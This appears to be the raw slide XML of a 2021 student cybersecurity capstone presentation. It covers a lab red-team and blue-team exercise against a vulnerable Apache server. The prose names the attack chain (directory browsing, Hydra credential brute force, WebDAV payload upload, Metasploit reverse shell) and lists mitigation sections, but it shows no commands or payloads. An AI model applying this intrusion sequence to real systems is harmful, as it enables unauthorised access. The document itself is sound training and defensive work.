            <p:cNvPr id="26" name="Google Shape;1038;p55">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{A660839E-EF75-4182-8894-4433647019B7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" name="Google Shape;1039;p55">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{4C786B9A-7C9B-47BA-A827-F427E85F85F7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043;p55">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{0EA0598A-8B00-4FCB-A1A2-68630602F14B}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1366404" y="427920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46;p55">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{A40B3E94-F094-4E22-9129-2F12A9973D28}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="43119" y="430691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Appendix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Details of tools and commands used for the analysis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4</a:t>
            </a:fld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4" y="910475"/>
            <a:ext cx="6764225" cy="3810116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6879600" y="954217"/>
            <a:ext cx="2160000" cy="3810116"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom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192.168.1.0  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                          192.168.1.255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server1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IPv4: 192.168.1.100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  <a:r>
              <a:rPr lang="en-AU" dirty="0"/>
              <a:t>Kali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Topology</a:t>
            </a:r>
            <a:endParaRPr dirty="0"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71AC5-B8D5-4FCF-BA79-4FB6BC52B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11" y="1086745"/>
            <a:ext cx="5162550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6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822146451"/>
              </p:ext>
            </p:extLst>
          </p:nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="468508" y="1112472"/>
          <a:ext cx="8335741" cy="3760940"/>
        </p:xfrm>
        <a:graphic>
          <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/table">
            <a:tbl>
              <a:tblPr>
                <a:noFill/>
                <a:tableStyleId>{C790312F-DD6D-41D6-B63C-62D0867D3197}</a:tableStyleId>
              </a:tblPr>
              <a:tblGrid>
                <a:gridCol w="2760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Browsing on the  Apache Server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Enable user’s browser to look up the directories on the apache server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use informat</a:t>
                      </a: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io</a:t>
                      </a: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 obtained from the browser and carried out further attacks.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03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AU" sz="1200" b="0" i="1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Blute</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-AU" sz="1200" b="0" i="1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Force Attack Vulnerability</a:t>
                      </a:r>
                      <a:endParaRPr sz="1200" b="0" i="1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to Brute Force Attack to comprised system credentials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0" i="1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Credentials were compromised.  Attacker gained access to the server.</a:t>
                      </a:r>
                      <a:endParaRPr sz="1200" b="0" i="1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0" i="1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AU" sz="1200" b="0" i="1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Vulnerability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Webserver is open to attack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AU"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1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 payload can be loaded to the </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1200" b="0" i="1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US" sz="1200" b="0" i="1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folder to carry out further attacks.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0" i="1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Metasploit </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-AU" sz="1200" b="0" i="1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Vulnerabilty</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-AU" sz="1200" b="0" i="1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Enable to listening into the target machine via a payload, and established a shell session.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AU"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1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Established a shell to the targeted machine and enable to navigate file directories, and obtain system information and targeted files on the target machine.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[Directory Browing on the Apache Server]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Firefox browser was used to browse the apache server directories	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Information related to the hidden file was discover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d with the browing of file contents on the apache server.  The informat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io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n was used to carried out a brute force attack.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BC7FC7-A91F-403A-8659-B07E4BF162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100" y="1746778"/>
            <a:ext cx="2329042" cy="17076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-AU" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Brute Force Attack Vulnerability</a:t>
            </a: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r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Capstone Engagement - Assessment, Analysis, and Hardening of a Vulnerable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Hydra was used to cracked  the credentials on a target user.	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Password was obtained from the brute force attack, then use to carry out further attacks.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16D989-7C9E-4B65-BFE7-DA368880F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809" y="2230134"/>
            <a:ext cx="2352566" cy="765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AD1533-A486-42B8-B2C1-E48ED77F2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992" y="1636939"/>
            <a:ext cx="2332200" cy="4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881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1728</Words>
  <Application>Microsoft Office PowerPoint</Application>
  <PresentationFormat>On-screen Show (16:9)</PresentationFormat>
  <Paragraphs>282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Roboto</vt:lpstr>
      <vt:lpstr>Roboto Light</vt:lpstr>
      <vt:lpstr>Roboto Thin</vt:lpstr>
      <vt:lpstr>Arial</vt:lpstr>
      <vt:lpstr>Roboto Black</vt:lpstr>
      <vt:lpstr>Roboto Medium</vt:lpstr>
      <vt:lpstr>Simple Light</vt:lpstr>
      <vt:lpstr>Capstone Engagement Assessment, Analysis,  and Hardening of a Vulnerable System  Eric Loi April 11, 2021</vt:lpstr>
      <vt:lpstr>Execute Summary</vt:lpstr>
      <vt:lpstr>Table of Contents </vt:lpstr>
      <vt:lpstr>Network Topology </vt:lpstr>
      <vt:lpstr>Network Topology</vt:lpstr>
      <vt:lpstr>Red Team Security Assessment </vt:lpstr>
      <vt:lpstr>Vulnerability Assessment</vt:lpstr>
      <vt:lpstr>Exploitation: [Directory Browing on the Apache Server]</vt:lpstr>
      <vt:lpstr>Exploitation: [Brute Force Attack Vulnerability]</vt:lpstr>
      <vt:lpstr>Exploitation: [webdav Vulnerability]</vt:lpstr>
      <vt:lpstr>Exploitation: [Metasploit Vulnerability]</vt:lpstr>
      <vt:lpstr>Blue Team Log Analysis and  Attack Characterization</vt:lpstr>
      <vt:lpstr>Analysis: Finding the Request for the Hidden Directory</vt:lpstr>
      <vt:lpstr>Analysis: Uncovering the Brute Force Attack</vt:lpstr>
      <vt:lpstr>Analysis: Finding the WebDAV Connection</vt:lpstr>
      <vt:lpstr>Analysis: remote shell vulnerability</vt:lpstr>
      <vt:lpstr>Blue Team Proposed Alarms and  Mitigation Strategies</vt:lpstr>
      <vt:lpstr>Mitigation: Request for the Hidden Directory</vt:lpstr>
      <vt:lpstr>Mitigation: Brute Force Attack</vt:lpstr>
      <vt:lpstr>Mitigation: WebDAV Connection</vt:lpstr>
      <vt:lpstr>Mitigation: Reverse Shell Uploads</vt:lpstr>
      <vt:lpstr>Conclusion</vt:lpstr>
      <vt:lpstr>Conclusion</vt:lpstr>
      <vt:lpstr>Appendix</vt:lpstr>
      <vt:lpstr>Code/Command used for : Finding the Hidden Directory</vt:lpstr>
      <vt:lpstr>Code/Command used for : Uncovering the Brute Force Attack</vt:lpstr>
      <vt:lpstr>Code/Command used for for: webdav vulnerability attack</vt:lpstr>
      <vt:lpstr>Code/Command used for: Metasploit attack 1/2</vt:lpstr>
      <vt:lpstr>Code/Command used for: Metasploit attack 2/2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Eric Loi</dc:creator>
  <cp:lastModifiedBy>Eric Loi</cp:lastModifiedBy>
  <cp:revision>33</cp:revision>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2021-04-12T03:56:57Z</dcterms:modified>
</cp:coreProperties>
</file>